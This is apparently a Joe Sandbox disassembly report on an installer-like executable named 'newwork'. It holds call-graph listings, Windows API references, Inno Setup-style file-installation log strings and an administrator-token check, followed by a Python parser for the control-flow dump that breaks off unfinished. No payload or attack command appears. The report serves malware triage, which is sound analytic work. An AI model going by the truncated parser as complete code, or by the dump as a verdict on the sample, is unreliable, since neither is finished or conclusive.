50414->50412 50416 46be3d 50417 403450 18 API calls 50416->50417 50418 46be4d 50417->50418 50419 46bea9 50418->50419 50420 46be59 50418->50420 50425 46bf6b 50419->50425 50549 46af68 50419->50549 50723 457f1c 50420->50723 50424 457f1c 38 API calls 50424->50431 50431->50414 50740 46c424 50435->50740 50438 46b852 50439 403420 4 API 
calls 50438->50439 50441 46b86c 50439->50441 50443 403400 4 API calls 50441->50443 50442 46b71e 50469 46b83e 50442->50469 50747 455f84 27 API calls 50442->50747 50445 46b874 50443->50445 50444 403450 18 API calls 50444->50438 50447 403400 4 API calls 50445->50447 50448 46b87c 50447->50448 50448->50382 50449 46b801 50449->50438 50455 42cd48 21 API calls 50449->50455 50449->50469 50452 46b73c 50453 46b7a1 50452->50453 50748 466600 50452->50748 50453->50438 50453->50449 50757 42cd48 50453->50757 50458 46b817 50455->50458 50463 451458 18 API calls 50458->50463 50458->50469 50460 466600 33 API calls 50462 46b77c 50460->50462 50465 46b82e 50463->50465 50764 47efd0 56 API calls 50465->50764 50469->50438 50469->50444 50471 468bb0 33 API calls 50470->50471 50472 468c83 50471->50472 50472->50399 50477 468bdf 50473->50477 50474 4078f4 33 API calls 50475 468c18 50474->50475 51018 453344 18 API calls 50475->51018 50477->50474 50478 468c20 50477->50478 50479 403400 4 API calls 50478->50479 50480 468c38 50479->50480 50480->50398 50482 46ace5 50481->50482 50483 46ace0 50481->50483 51104 469a80 60 API calls 50482->51104 50484 46ace3 50483->50484 51019 46a740 50483->51019 50484->50398 50486 46aced 50486->50398 50489 403400 4 API calls 50488->50489 50490 469f4a 50489->50490 51481 47dd00 50490->51481 50492 469fad 50493 469fb1 50492->50493 50494 469fca 50492->50494 51488 466800 50493->51488 50496 469fbb 50494->50496 51491 494c90 18 API calls 50494->51491 50497 46a25e 50496->50497 50499 46a154 50496->50499 50500 46a0e9 50496->50500 50501 403420 4 API calls 50497->50501 50505 403494 4 API calls 50499->50505 50504 403494 4 API calls 50500->50504 50506 46a288 50501->50506 50502 469fe6 50502->50496 50503 469fee 50502->50503 50507 46af68 37 API calls 50503->50507 50508 46a0f6 50504->50508 50509 46a161 50505->50509 50506->50416 50516 469ffb 50507->50516 50510 40357c 18 API calls 50508->50510 50511 40357c 18 API calls 50509->50511 50512 46a103 50510->50512 50513 46a16e 50511->50513 50514 
40357c 18 API calls 50512->50514 50515 40357c 18 API calls 50513->50515 50517 46a110 50514->50517 50518 46a17b 50515->50518 50521 46a024 SetActiveWindow 50516->50521 50522 46a03c 50516->50522 50519 40357c 18 API calls 50517->50519 50520 40357c 18 API calls 50518->50520 50523 46a11d 50519->50523 50524 46a188 50520->50524 50521->50522 51492 42f560 50522->51492 50526 466800 34 API calls 50523->50526 50525 40357c 18 API calls 50524->50525 50528 46a196 50525->50528 50527 46a12b 50526->50527 50529 40357c 18 API calls 50527->50529 50530 414b18 18 API calls 50528->50530 50532 46a134 50529->50532 50533 46a152 50530->50533 50535 40357c 18 API calls 50532->50535 51509 466b38 50533->51509 50538 46a141 50535->50538 50540 414b18 18 API calls 50538->50540 50539 46a08d 50541 46ade4 35 API calls 50539->50541 50540->50533 50542 46a0bf 50541->50542 50542->50416 50550 468c74 33 API calls 50549->50550 50551 46af80 50550->50551 50552 46afa2 50551->50552 50553 4652cc 21 API calls 50551->50553 51705 4652cc 50552->51705 50553->50552 50557 46afba 50558 46ade4 35 API calls 50557->50558 50559 46aff2 50558->50559 50560 414b18 18 API calls 50559->50560 50561 46b006 50560->50561 50562 46b012 50561->50562 50563 46b03c 50561->50563 50564 414b18 18 API calls 50562->50564 50565 46b05b 50563->50565 50566 46b085 50563->50566 50567 46b026 50564->50567 50568 414b18 18 API calls 50565->50568 50569 414b18 18 API calls 50566->50569 50570 414b18 18 API calls 50567->50570 50571 46b06f 50568->50571 50572 46b099 50569->50572 50573 46b03a 50570->50573 50574 414b18 18 API calls 50571->50574 50575 414b18 18 API calls 50572->50575 51722 46acfc 50573->51722 50574->50573 50575->50573 50627 46c424 62 API calls 50626->50627 50628 4830c7 50627->50628 50629 4830d0 50628->50629 51992 408be0 19 API calls 50628->51992 50631 414ae8 18 API calls 50629->50631 50632 4830e0 50631->50632 50633 403450 18 API calls 50632->50633 50634 4830ed 50633->50634 51794 46c77c 50634->51794 50637 4830fd 50639 414ae8 18 API calls 50637->50639 
50640 48310d 50639->50640 50641 403450 18 API calls 50640->50641 50642 48311a 50641->50642 50643 469868 SendMessageA 50642->50643 50644 483133 50643->50644 50645 483184 50644->50645 51994 479e18 37 API calls 50644->51994 51823 4241dc IsIconic 50645->51823 50649 48319f SetActiveWindow 50650 4831b4 50649->50650 51831 4824b4 50650->51831 50699->50397 50700->50382 50701->50382 50702->50382 53655 43d9c8 50703->53655 50706 494dcc 53660 431bd0 50706->53660 50707 494e52 50708 494e61 50707->50708 53693 4945c8 18 API calls 50707->53693 50708->50398 50717 494e16 53691 49465c 18 API calls 50717->53691 50719 494e2a 53692 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50719->53692 50721 494e4a 50721->50398 50722->50407 50724 457f41 50723->50724 50725 457f61 50724->50725 50726 4078f4 33 API calls 50724->50726 50728 403400 4 API calls 50725->50728 50727 457f59 50726->50727 50729 457d10 38 API calls 50727->50729 50730 457f76 50728->50730 50729->50725 50730->50424 50739->50398 50765 46c4bc 50740->50765 50743 414ae8 50744 414af6 50743->50744 50745 4034e0 18 API calls 50744->50745 50746 414b03 50745->50746 50746->50442 50747->50452 50749 46661a 50748->50749 50969 4078f4 50749->50969 51012 42cccc 50757->51012 50760 451458 50761 451428 18 API calls 50760->50761 50762 451474 50761->50762 50763 47efd0 56 API calls 50762->50763 50763->50449 50764->50469 50766 414ae8 18 API calls 50765->50766 50767 46c4f0 50766->50767 50826 466898 50767->50826 50771 46c502 50772 46c511 50771->50772 50776 46c52a 50771->50776 50896 47efd0 56 API calls 50772->50896 50774 403420 4 API calls 50775 46b702 50774->50775 50775->50438 50775->50743 50777 46c571 50776->50777 50778 46c558 50776->50778 50779 46c5d6 50777->50779 50792 46c575 50777->50792 50897 47efd0 56 API calls 50778->50897 50899 42cb4c CharNextA 50779->50899 50782 46c5e5 50783 46c5e9 50782->50783 50787 46c602 50782->50787 50900 47efd0 56 API calls 50783->50900 50785 46c5bd 50898 47efd0 56 API calls 50785->50898 50786 46c626 50901 47efd0 56 API 
calls 50786->50901 50787->50786 50840 466a08 50787->50840 50791 46c616 50791->50786 50845 466a38 50791->50845 50792->50785 50792->50787 50795 46c63f 50849 403778 50795->50849 50800 46c666 50902 466a94 18 API calls 50800->50902 50801 46c697 50860 42c8cc 50801->50860 50804 46c679 50807 451458 18 API calls 50804->50807 50809 46c686 50807->50809 50903 47efd0 56 API calls 50809->50903 50813 46c525 50813->50774 50831 4668b2 50826->50831 50828 42cbc0 20 API calls 50828->50831 50829 403450 18 API calls 50829->50831 50830 406bb0 18 API calls 50830->50831 50831->50828 50831->50829 50831->50830 50832 4668fb 50831->50832 50906 42caac 50831->50906 50833 403420 4 API calls 50832->50833 50834 466915 50833->50834 50835 414b18 50834->50835 50836 414ae8 18 API calls 50835->50836 50837 414b3c 50836->50837 50838 403400 4 API calls 50837->50838 50839 414b6d 50838->50839 50839->50771 50843 466a12 50840->50843 50841 466a33 50841->50791 50842 466a25 50842->50791 50843->50841 50843->50842 50922 42cb3c CharNextA 50843->50922 50847 466a42 50845->50847 50846 466a6f 50846->50786 50846->50795 50847->50846 50923 42cb3c CharNextA 50847->50923 50850 4037aa 50849->50850 50852 40377d 50849->50852 50851 403400 4 API calls 50850->50851 50853 4037a0 50851->50853 50852->50850 50854 403791 50852->50854 50856 42c99c 50853->50856 50855 4034e0 18 API calls 50854->50855 50855->50853 50857 42c9f5 50856->50857 50858 42c9b2 50856->50858 50857->50800 50857->50801 50858->50857 50924 42cb3c CharNextA 50858->50924 50925 42c674 50860->50925 50896->50813 50897->50813 50898->50813 50899->50782 50900->50813 50901->50813 50902->50804 50903->50813 50907 403494 4 API calls 50906->50907 50910 42cabc 50907->50910 50908 403744 18 API calls 50908->50910 50910->50908 50913 42caf2 50910->50913 50915 42c444 IsDBCSLeadByte 50910->50915 50911 42cb36 50911->50831 50913->50911 50916 4037b8 50913->50916 50921 42c444 IsDBCSLeadByte 50913->50921 50915->50910 50917 403744 18 API calls 50916->50917 50918 4037c6 50917->50918 50919 4037fc 
50918->50919 50920 4038a4 18 API calls 50918->50920 50919->50913 50920->50919 50921->50913 50922->50843 50923->50847 50924->50858 50928 42c67c 50925->50928 50931 42c68d 50928->50931 50929 42c6f1 50932 42c6ec 50929->50932 50936 42c444 IsDBCSLeadByte 50929->50936 50931->50929 50934 42c6ab 50931->50934 50934->50932 50935 42c444 IsDBCSLeadByte 50934->50935 50935->50934 50936->50932 50972 407908 50969->50972 50973 407925 50972->50973 50980 4075b8 50973->50980 50976 407951 50978 4034e0 18 API calls 50976->50978 50979 407903 50978->50979 50979->50460 50983 4075d3 50980->50983 50981 4075e5 50981->50976 50985 4069a0 19 API calls 50981->50985 50983->50981 50986 4076da 33 API calls 50983->50986 50987 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50983->50987 50985->50976 50986->50983 50987->50983 51013 42cbc0 20 API calls 51012->51013 51014 42ccee 51013->51014 51015 42ccf6 GetFileAttributesA 51014->51015 51016 403400 4 API calls 51015->51016 51017 42cd13 51016->51017 51017->50449 51017->50760 51018->50478 51021 46a787 51019->51021 51020 46abff 51023 46ac1a 51020->51023 51024 46ac4b 51020->51024 51021->51020 51022 46a842 51021->51022 51027 403494 4 API calls 51021->51027 51026 46a863 51022->51026 51030 46a8a4 51022->51030 51028 403494 4 API calls 51023->51028 51025 403494 4 API calls 51024->51025 51029 46ac59 51025->51029 51031 403494 4 API calls 51026->51031 51032 46a7c6 51027->51032 51033 46ac28 51028->51033 51132 46915c 26 API calls 51029->51132 51034 403400 4 API calls 51030->51034 51036 46a871 51031->51036 51037 414ae8 18 API calls 51032->51037 51131 46915c 26 API calls 51033->51131 51039 46a8a2 51034->51039 51040 414ae8 18 API calls 51036->51040 51041 46a7e7 51037->51041 51062 46a988 51039->51062 51111 469868 51039->51111 51044 46a892 51040->51044 51105 403634 51041->51105 51042 46ac36 51043 403400 4 API calls 51042->51043 51047 46ac7c 51043->51047 51049 403634 18 API calls 51044->51049 51054 403400 4 API calls 51047->51054 51048 46aa10 51052 403400 4 API calls 
51048->51052 51049->51039 51056 46aa0e 51052->51056 51053 46a8c4 51057 46a902 51053->51057 51058 46a8ca 51053->51058 51059 46ac84 51054->51059 51126 469ca4 57 API calls 51056->51126 51063 403400 4 API calls 51057->51063 51060 403494 4 API calls 51058->51060 51061 403420 4 API calls 51059->51061 51065 46a8d8 51060->51065 51066 46ac91 51061->51066 51062->51048 51067 46a9cf 51062->51067 51068 46a900 51063->51068 51117 47c26c 51065->51117 51066->50484 51072 403494 4 API calls 51067->51072 51120 469b5c 51068->51120 51076 46a9dd 51072->51076 51074 46aa39 51083 46aa44 51074->51083 51084 46aa9a 51074->51084 51075 46a8f0 51078 403634 18 API calls 51075->51078 51079 414ae8 18 API calls 51076->51079 51078->51068 51080 46a9fe 51079->51080 51082 403634 18 API calls 51080->51082 51081 46a929 51087 46a934 51081->51087 51088 46a98a 51081->51088 51082->51056 51086 403494 4 API calls 51083->51086 51085 403400 4 API calls 51084->51085 51093 46aaa2 51085->51093 51089 46aa52 51086->51089 51091 403494 4 API calls 51087->51091 51090 403400 4 API calls 51088->51090 51089->51093 51097 403634 18 API calls 51089->51097 51098 46aa98 51089->51098 51090->51062 51092 46a942 51091->51092 51092->51062 51099 403634 18 API calls 51092->51099 51103 46ab4b 51093->51103 51127 494c90 18 API calls 51093->51127 51095 46aac5 51095->51103 51128 494f3c 32 API calls 51095->51128 51097->51089 51098->51093 51099->51092 51101 46abec 51130 429144 SendMessageA SendMessageA 51101->51130 51129 4290f4 SendMessageA 51103->51129 51104->50486 51106 40363c 51105->51106 51107 4034bc 18 API calls 51106->51107 51108 40364f 51107->51108 51109 403450 18 API calls 51108->51109 51110 403677 51109->51110 51133 42a040 SendMessageA 51111->51133 51113 469877 51114 469897 51113->51114 51134 42a040 SendMessageA 51113->51134 51114->51053 51116 469887 51116->51053 51135 47c2b4 51117->51135 51124 469b89 51120->51124 51121 469beb 51122 403400 4 API calls 51121->51122 51123 469c00 51122->51123 51123->51081 51124->51121 51480 469ae0 57 API 
calls 51124->51480 51126->51074 51127->51095 51128->51103 51129->51101 51130->51020 51131->51042 51132->51042 51133->51113 51134->51116 51136 403494 4 API calls 51135->51136 51143 47c2e7 51136->51143 51137 47c3f9 51138 403420 4 API calls 51137->51138 51139 47c289 51138->51139 51139->51075 51141 403778 18 API calls 51141->51143 51143->51137 51143->51141 51146 4037b8 18 API calls 51143->51146 51147 47b100 51143->51147 51391 453344 18 API calls 51143->51391 51392 403800 51143->51392 51396 42c97c CharPrevA 51143->51396 51146->51143 51148 47b152 51147->51148 51149 47b130 51147->51149 51150 47b172 51148->51150 51151 47b160 51148->51151 51149->51148 51401 47a030 33 API calls 51149->51401 51154 47b1d5 51150->51154 51155 47b180 51150->51155 51152 403494 4 API calls 51151->51152 51220 47b16d 51152->51220 51167 47b1f6 51154->51167 51168 47b1e3 51154->51168 51157 47b1af 51155->51157 51158 47b189 51155->51158 51156 403400 4 API calls 51160 47baf8 51156->51160 51159 47b1c2 51157->51159 51403 453344 18 API calls 51157->51403 51161 47b19c 51158->51161 51402 453344 18 API calls 51158->51402 51165 403494 4 API calls 51159->51165 51166 403400 4 API calls 51160->51166 51163 403494 4 API calls 51161->51163 51163->51220 51165->51220 51169 47bb00 51166->51169 51171 47b217 51167->51171 51172 47b204 51167->51172 51170 403494 4 API calls 51168->51170 51169->51143 51170->51220 51174 47b267 51171->51174 51175 47b225 51171->51175 51173 403494 4 API calls 51172->51173 51173->51220 51181 47b275 51174->51181 51182 47b288 51174->51182 51176 47b241 51175->51176 51177 47b22e 51175->51177 51179 47b254 51176->51179 51404 453344 18 API calls 51176->51404 51178 403494 4 API calls 51177->51178 51178->51220 51180 403494 4 API calls 51179->51180 51180->51220 51184 403494 4 API calls 51181->51184 51185 47b296 51182->51185 51186 47b2a9 51182->51186 51184->51220 51187 403494 4 API calls 51185->51187 51188 47b2b7 51186->51188 51189 47b2ca 51186->51189 51187->51220 51190 403494 4 API calls 51188->51190 51191 
47b2eb 51189->51191 51192 47b2d8 51189->51192 51190->51220 51194 47b327 51191->51194 51195 47b2f9 51191->51195 51193 403494 4 API calls 51192->51193 51193->51220 51200 47b335 51194->51200 51201 47b364 51194->51201 51196 47b315 51195->51196 51197 47b302 51195->51197 51199 47c26c 57 API calls 51196->51199 51198 403494 4 API calls 51197->51198 51198->51220 51199->51220 51202 47b351 51200->51202 51203 47b33e 51200->51203 51206 47b372 51201->51206 51207 47b3a0 51201->51207 51205 403494 4 API calls 51202->51205 51204 403494 4 API calls 51203->51204 51204->51220 51205->51220 51208 47b38e 51206->51208 51209 47b37b 51206->51209 51212 47b3ae 51207->51212 51213 47b3dd 51207->51213 51211 47c26c 57 API calls 51208->51211 51210 403494 4 API calls 51209->51210 51210->51220 51211->51220 51214 47b3b7 51212->51214 51215 47b3ca 51212->51215 51218 47b3fe 51213->51218 51219 47b3eb 51213->51219 51220->51156 51391->51143 51393 403804 51392->51393 51395 40382f 51392->51395 51394 4038a4 18 API calls 51393->51394 51394->51395 51395->51143 51396->51143 51401->51149 51402->51161 51403->51159 51404->51179 51480->51124 51482 47dd19 51481->51482 51485 47dd56 51481->51485 51513 455d0c 51482->51513 51485->50492 51487 47dd6d 51487->50492 51632 466714 51488->51632 51491->50502 51493 42f56c 51492->51493 51494 42f58f GetActiveWindow GetFocus 51493->51494 51495 41eea4 2 API calls 51494->51495 51496 42f5a6 51495->51496 51497 42f5c3 51496->51497 51498 42f5b3 RegisterClassA 51496->51498 51499 42f652 SetFocus 51497->51499 51500 42f5d1 CreateWindowExA 51497->51500 51498->51497 51502 403400 4 API calls 51499->51502 51500->51499 51501 42f604 51500->51501 51663 42427c 51501->51663 51504 42f66e 51502->51504 51508 494f3c 32 API calls 51504->51508 51505 42f62c 51506 42f634 CreateWindowExA 51505->51506 51506->51499 51507 42f64a ShowWindow 51506->51507 51507->51499 51508->50539 51669 44b514 51509->51669 51514 455d1d 51513->51514 51515 455d21 51514->51515 51516 455d2a 51514->51516 51539 455a10 51515->51539 51547 
Control-flow graph (Joe Sandbox IDA Plugin): edge listing not reproducible as text. Windows API calls named in the graph nodes: RegOpenKeyExA, RegQueryValueExA, RegCloseKey, IsDBCSLeadByte, GetWindowTextA, GetDC, SelectObject, CreateFontIndirectA, SetFocus, GetFocus, LoadStringA, CharNextA, SetActiveWindow, SystemParametersInfoA, ShowWindow, LocalAlloc, TlsSetValue, TlsGetValue, SetWindowPos, GetSystemTimeAsFileTime, FileTimeToSystemTime, SetCurrentDirectoryA, GetWindowLongA, SetWindowLongA, GetSystemMetrics, SetScrollInfo, GetScrollPos, SetScrollPos, IsWindowVisible, ScrollWindow, KiUserCallbackDispatcher, MulDiv, SetPropA, IsIconic, SendMessageA, PostMessageA, PostQuitMessage, WinHelpA, NtdllDefWindowProc_A, GetCurrentThreadId, EnumThreadWindows, EnumWindows, GetWindow, IsWindowEnabled, GetWindowsDirectoryA, GetSystemDirectoryA, SHGetKnownFolderPath, CoTaskMemFree, GetEnvironmentVariableA.
                                                                                        Strings
                                                                                        • Time stamp of our file: %s, xrefs: 0047099B
                                                                                        • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                        • Dest file exists., xrefs: 004709BB
                                                                                        • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                        • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                        • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                        • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                        • Installing the file., xrefs: 00470F09
                                                                                        • Dest filename: %s, xrefs: 00470894
                                                                                        • @, xrefs: 004707B0
                                                                                        • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                        • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                        • Same version. Skipping., xrefs: 00470CE5
                                                                                        • -- File entry --, xrefs: 004706FB
                                                                                        • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                        • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                        • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                        • Version of existing file: (none), xrefs: 00470CFA
                                                                                        • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                        • InUn, xrefs: 0047115F
                                                                                        • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                        • .tmp, xrefs: 00470FB7
                                                                                        • Same time stamp. Skipping., xrefs: 00470D55
                                                                                        • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                        • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                        • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                        • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                        • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                        • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                        • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                        • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                        • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                        • Stripped read-only attribute., xrefs: 00470EC7
                                                                                        • Version of our file: (none), xrefs: 00470AFC
                                                                                        • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                        • Installing into GAC, xrefs: 00471714
                                                                                        • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                        • Will register the file (a type library) later., xrefs: 00471513
                                                                                        • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                        • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                        • API String ID: 0-4021121268
                                                                                        • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                        • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                        • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                        • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                        • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                        • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                        • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                        • API String ID: 2252812187-1888249752
                                                                                        • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                        • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                        • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                        • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79
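The control_flow_graph dump above is a flat token stream, which hides the branch structure that matters for triage. The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses that dump into basic blocks and edges and walks the graph to recover the guard sequence in front of each API. Read that way, the function at 0042E09C is the classic administrator-membership routine: build a SID (block 1579), check GetVersion (1582), resolve CheckTokenMembership with GetProcAddress (1583), then either take the CheckTokenMembership branch (1586) or fall back to OpenThreadToken/OpenProcessToken, GetTokenInformation and an EqualSid loop over the token's groups (1585, 1589, 1591, 1611). The dump string is copied from the block above; the token grammar (numeric block id, start-end address range, API labels, `call addr`, `* N` repeat counts, `a->b` edges) is inferred from it and is an assumption of this example, not a documented format.

```python
import re
from collections import deque
from dataclasses import dataclass, field

# Constructed input: the control_flow_graph dump of the function at 0042E09C,
# copied from the report block above (one token stream, wrapped here for width).
CFG_DUMP = (
    "control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid "
    "1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 "
    "1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 "
    "1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 "
    "1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 "
    "1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 "
    "1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 "
    "1588 42e269-42e27f FreeSid 1586->1588 1587->1588 "
    "1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 "
    "1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 "
    "1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 "
    "1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 "
    "1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 "
    "1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 "
    "1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 "
    "1616->1608 1616->1611 1619->1608"
)

RANGE_RE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")


@dataclass
class Block:
    node_id: int
    start: int  # first instruction address of the basic block
    end: int    # last instruction address of the basic block
    labels: list = field(default_factory=list)  # API names and "call <addr>" annotations

    @property
    def apis(self):
        """Imported API names only; internal 'call <addr>' annotations are dropped."""
        return [lbl for lbl in self.labels if not lbl.startswith("call ")]


def parse_cfg(dump):
    """Turn the token stream into ({block_id: Block}, [(src, dst), ...]).

    '* N' is handled before the generic digit test: otherwise the N of
    'call 4031bc * 2' would be read as the id of a new block.
    """
    tokens = dump.split()
    if not tokens or tokens[0] != "control_flow_graph":
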